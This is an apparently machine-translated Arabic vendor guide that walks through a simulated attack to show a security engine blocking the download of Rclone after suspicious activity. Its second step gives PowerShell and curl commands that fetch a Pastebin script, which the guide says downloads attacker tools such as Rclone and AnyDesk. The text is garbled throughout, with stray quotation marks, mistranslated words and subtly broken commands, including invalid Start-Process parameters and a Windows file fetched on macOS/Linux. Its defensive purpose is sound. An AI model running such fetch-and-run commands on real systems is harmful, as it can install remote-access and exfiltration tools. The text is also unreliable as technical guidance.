عرض كيفية حماية الوقاية التوكيلية لشبكتك

Prev Next

التعيين

الوقاية التوكيلية هي محرك أمان يطبق ضوابط ديناميكية استباقية استجابةً للتهديدات المكتشفة لتقليل سطح الهجوم والتخفيف من التهديدات في وقت مبكر قبل حدوث أي تأثير. لمزيد من المعلومات، انظر ما هي الوقاية التوكيلية؟

تُحاكي هذه المقالة سيناريو هجوم حقيقي لإظهار كيفية حماية الوقاية التوكيلية لشبكتك. على الرغم من أن هذا ليس تهديدًا جسيمًا، فإنه يوضح كيفية تطبيق الضوابط لمنع استخدام تقنيات مماثلة في هجوم جسيم.

""في هذا المثال، يقوم المستخدم بتحميل سكريبت من Pastebin يستخدمه المهاجم لمحاولة استرداد أدوات عالية الخطورة مطلوبة لتنفيذ هجوم مستقبلي تحدد الوقاية التوكيلية السلوك الضار وتمنع تنزيل الأداة، مما يمنع الهجوم قبل أن يتقدم أو يحدث أي تأثير.

الاستجابة لهذا الهجوم مؤتمتة بالكامل لا توجد قواعد إضافية مطلوبة مجرد تمكين الوقاية التوكيلية يكون كافيًا لمنع الهجوم.

""لمحاكاة هذا الهجوم:

  1. ""تحميل أداة عالية الخطورة بدون أن يتم حجبها

  2. تحميل السكريبت من Pastebin

  3. ""حاول مرة أخرى تنزيل الأدوات عالية الخطورة ""هذه المرة يتم حجب التنزيل

    ملاحظة: على الرغم من أن هذا السيناريو ليس حوكمي، إلا أنه يوضح كيف يمكن للضوابط أن تساعد في منع استخدام تقنيات مشابهة في الهجمات الحوكمية.

المتطلبات السابقة

  • الوقاية التوكيلية مُمَكَّنة مع ضبط الإجراءات على حجب

الخطوة 1: تنزيل أداة عالية الخطورة

لاختبار أن الوقاية التوكيلية تحجب الإجراءات فقط عندما تكون جزءًا من سلسلة تصرفات ضارة، قم أولاً بتنزيل أداة Rclone، وهي أداة سطر أوامر مفتوحة المصدر لإدارة الملفات. ""غالبًا ما يستخدم المهاجمون Rclone كأداة ما بعد الاختراق لأنها شرعية وقوية وتندمج مع النشاط الإداري الطبيعي

العمل

تحميل Rclone من أحد الخيارات التالية:

  • عنوان URL التالي: https://downloads.rclone.org/rclone-current-windows-amd64.zip

  • على أجهزة Windows:

    • الأمر التالي لـ PowerShell: Start-Process \"https://downloads.rclone.org/rclone-current-windows-amd64.zip\" -Label \"RClone\"

  • على أجهزة macOS/Linux:

    • الأمر التالي لـ Terminal: curl -sSL \"https://downloads.rclone.org/rclone-current-windows-amd64.zip\"

النتيجة

""يتم تحميل الملف بنجاح

شرح

""هذا يؤكد أن العملية غير محجوبة عندما تكون منفردة لأنها لا تعتبر ضارة عندما لا تسبقها أي نشاط مريب

الخطوة 2: تنزيل برنامج نصي من Pastebin

""لمحاكاة بدء هجوم، قم بتحميل سكريبت من Pastebin الذي، عند تنفيذه، يقوم بتحميل أدوات المهاجمين الشائعة، مثل Rclone و AnyDesk للوصول عن بعد وجمع البيانات

الإجراء

""تحميل وتشغيل السكريبت من Pastebin:

  • على أجهزة Windows:

    • أمر PowerShell التالي: (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')

  • على أجهزة macOS/Linux:

    • الأمر التالي لـ Terminal: curl -sSL \"https://pastebin.com/raw/tXhVK2V7\"

النتيجة

""يعمل السكريبت ويقوم بتحميل الأدوات يتم تطبيق تحكم ديناميكي على الجهاز المضيف، ويظهر في صفحة التهديدات التوكيلية. لمزيد من المعلومات، انظر مراقبة الوقاية التوكيلية للتهديدات

توضيح

تكتشف الوقاية التوكيلية مؤشرات السلوك المشبوه وتفرض ضوابط بشكل استباقي لحجب الإجراءات الضارة اللاحقة، مما يوقف الهجوم قبل حدوث أي تأثير.

الخطوة 3: تنزيل أداة عالية الخطورة

""في الهجوم المحاكى، يحاول المهاجم تنزيل Rclone ومع ذلك، نظرًا لأن هذا الإجراء يتبع النشاط المشبوه لتنزيل السكريبت من Pastebin ويتم تطبيق تحكم، فإن الوقاية التوكيلية تحجب تنزيل Rclone.

الإجراء

تنزيل Rclone باستخدام أي من هذه الخيارات:

  • مباشرة من موقع Rclone: https://downloads.rclone.org/rclone-current-windows-amd64.zip

  • هذا الأمر لـ PowerShell (على Windows): Start-Process -Url \"https://downloads.rclone.org/rclone-current-windows-amd64.zip\" -Label \"RClone\"

  • هذا الأمر لـ Terminal (على macOS/Linux): curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"

النتيجة

""يتم حجب تحميل هذا الملف بواسطة التحكم يظهر التهديد المُخفَّف في صفحة التهديدات التوكيلية.

توضيح

على عكس الخطوة 1، حيث تم تشغيل السكريبت بمفرده وتم السماح به، فإن تنزيل هذا السكريبت سبقه إجراء مشبوه وتم حجبه بواسطة الوقاية التوكيلية.

عرض

هذا الفيديو يظهر عرضاً لهذا الهجوم المحاكى: